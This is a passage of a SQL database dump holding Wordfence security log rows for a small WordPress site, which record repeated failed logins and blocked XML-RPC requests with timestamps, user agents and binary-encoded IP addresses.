Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10664,0.000000,1630989071.693511,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10665,0.000000,1630989082.288049,'\0\0\0\0\0\0\0\0\0\0��gx�_',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10666,0.000000,1630994443.599176,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10667,0.000000,1630994451.959823,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10668,0.000000,1630994457.058756,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10669,0.000000,1630994473.728836,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10670,0.000000,1630994478.976072,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10671,0.000000,1630994483.231339,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10672,0.000000,1630994487.714600,'\0\0\0\0\0\0\0\0\0\0���xk',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10673,0.000000,1630996019.803469,'\0\0\0\0\0\0\0\0\0\0���zaD',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10674,0.000000,1630997326.691635,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10675,0.000000,1630997745.717109,'\0\0\0\0\0\0\0\0\0\0��[��Y',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10676,0.000000,1630997744.597547,'\0\0\0\0\0\0\0\0\0\0��-wT�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10677,0.000000,1630998667.495231,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10678,0.000000,1630998687.035560,'\0\0\0\0\0\0\0\0\0\0���[K ',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10679,0.000000,1630999416.375645,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10680,0.000000,1630999434.120479,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10681,0.000000,1631000176.718317,'\0\0\0\0\0\0\0\0\0\0���ً',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10682,0.000000,1631000178.189677,'\0\0\0\0\0\0\0\0\0\0����2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10683,0.000000,1631000875.650454,'\0\0\0\0\0\0\0\0\0\0��g�k',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10684,0.000000,1631000897.458932,'\0\0\0\0\0\0\0\0\0\0���O�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10685,0.000000,1631001673.864599,'\0\0\0\0\0\0\0\0\0\0���3�:',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10686,0.000000,1631002541.890197,'\0\0\0\0\0\0\0\0\0\0��>��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10687,0.000000,1631002562.926082,'\0\0\0\0\0\0\0\0\0\0��1��E',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10688,0.000000,1631003490.106932,'\0\0\0\0\0\0\0\0\0\0���)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10689,0.000000,1631003517.466263,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10690,0.000000,1631004486.873488,'\0\0\0\0\0\0\0\0\0\0���[i�',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(10691,0.000000,1631004498.958146,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10692,0.000000,1631005524.041097,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10693,0.000000,1631005526.679880,'\0\0\0\0\0\0\0\0\0\0���c6',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10694,0.000000,1631006597.398692,'\0\0\0\0\0\0\0\0\0\0��C��T',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10695,0.000000,1631006606.812337,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10696,0.000000,1631007784.224499,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10697,0.000000,1631007786.868441,'\0\0\0\0\0\0\0\0\0\0���Y',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10698,0.000000,1631009165.589473,'\0\0\0\0\0\0\0\0\0\0���]\"�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10699,0.000000,1631009181.767516,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10700,0.000000,1631010330.410466,'\0\0\0\0\0\0\0\0\0\0����f�',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10701,0.000000,1631010738.150826,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10702,0.000000,1631010743.589630,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10703,0.000000,1631012238.108342,'\0\0\0\0\0\0\0\0\0\0��;=�1',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10704,0.000000,1631012246.471104,'\0\0\0\0\0\0\0\0\0\0��=U*3',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10705,0.000000,1631012255.003891,'\0\0\0\0\0\0\0\0\0\0��=U*3',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10706,0.000000,1631012262.787239,'\0\0\0\0\0\0\0\0\0\0��=U*3',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10707,0.000000,1631012272.261947,'\0\0\0\0\0\0\0\0\0\0��=U*3',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10708,0.000000,1631012284.423961,'\0\0\0\0\0\0\0\0\0\0��=U*3',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10709,0.000000,1631012290.321257,'\0\0\0\0\0\0\0\0\0\0��=U*3',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(10710,0.000000,1631012617.367074,'\0\0\0\0\0\0\0\0\0\0���]�`',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10711,0.000000,1631012640.863599,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10712,0.000000,1631021907.133022,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10713,0.000000,1631021908.204841,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10714,0.000000,1631022528.839005,'\0\0\0\0\0\0\0\0\0\0��ν��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10715,0.000000,1631023113.319237,'\0\0\0\0\0\0\0\0\0\0��g��E',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10716,0.000000,1631023148.688542,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10717,0.000000,1631023703.259566,'\0\0\0\0\0\0\0\0\0\0��<�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10718,0.000000,1631023713.372648,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10719,0.000000,1631024295.288878,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10720,0.000000,1631024322.973758,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10721,0.000000,1631024900.752976,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10722,0.000000,1631024906.178923,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10723,0.000000,1631025458.597581,'\0\0\0\0\0\0\0\0\0\0����؛',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10724,0.000000,1631025479.541588,'\0\0\0\0\0\0\0\0\0\0��}�9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10725,0.000000,1631025997.960707,'\0\0\0\0\0\0\0\0\0\0��g� ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10726,0.000000,1631026017.566071,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10727,0.000000,1631026527.202609,'\0\0\0\0\0\0\0\0\0\0����5u',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10728,0.000000,1631026529.613037,'\0\0\0\0\0\0\0\0\0\0����w�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10729,0.000000,1631027071.458950,'\0\0\0\0\0\0\0\0\0\0��/r�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10730,0.000000,1631027075.410814,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10731,0.000000,1631027549.663917,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10732,0.000000,1631027567.821569,'\0\0\0\0\0\0\0\0\0\0��k�i�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10733,0.000000,1631028074.428968,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10734,0.000000,1631028077.435630,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10735,0.000000,1631028566.509995,'\0\0\0\0\0\0\0\0\0\0���q�u',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10736,0.000000,1631028569.780884,'\0\0\0\0\0\0\0\0\0\0��g/<,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10737,0.000000,1631029064.733719,'\0\0\0\0\0\0\0\0\0\0��/aP3',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10738,0.000000,1631029069.765161,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10739,0.000000,1631029582.566614,'\0\0\0\0\0\0\0\0\0\0��#ÇC',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10740,0.000000,1631030066.307431,'\0\0\0\0\0\0\0\0\0\0���\0�D',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10741,0.000000,1631030086.321508,'\0\0\0\0\0\0\0\0\0\0��3�]',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10742,0.000000,1631030595.841169,'\0\0\0\0\0\0\0\0\0\0��t�$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10743,0.000000,1631030605.248595,'\0\0\0\0\0\0\0\0\0\0��C��T',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10744,0.000000,1631031103.703277,'\0\0\0\0\0\0\0\0\0\0����P',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10745,0.000000,1631031104.661998,'\0\0\0\0\0\0\0\0\0\0���]\"�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10746,0.000000,1631031620.131547,'\0\0\0\0\0\0\0\0\0\0��/�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10747,0.000000,1631031642.197445,'\0\0\0\0\0\0\0\0\0\0��JЈ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10748,0.000000,1631032174.932404,'\0\0\0\0\0\0\0\0\0\0��#��N',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10749,0.000000,1631032180.485357,'\0\0\0\0\0\0\0\0\0\0��#�ޥ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10750,0.000000,1631032703.594665,'\0\0\0\0\0\0\0\0\0\0��g���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10751,0.000000,1631032709.814132,'\0\0\0\0\0\0\0\0\0\0���H�%',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10752,0.000000,1631033244.880179,'\0\0\0\0\0\0\0\0\0\0���X�$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10753,0.000000,1631033248.254475,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by 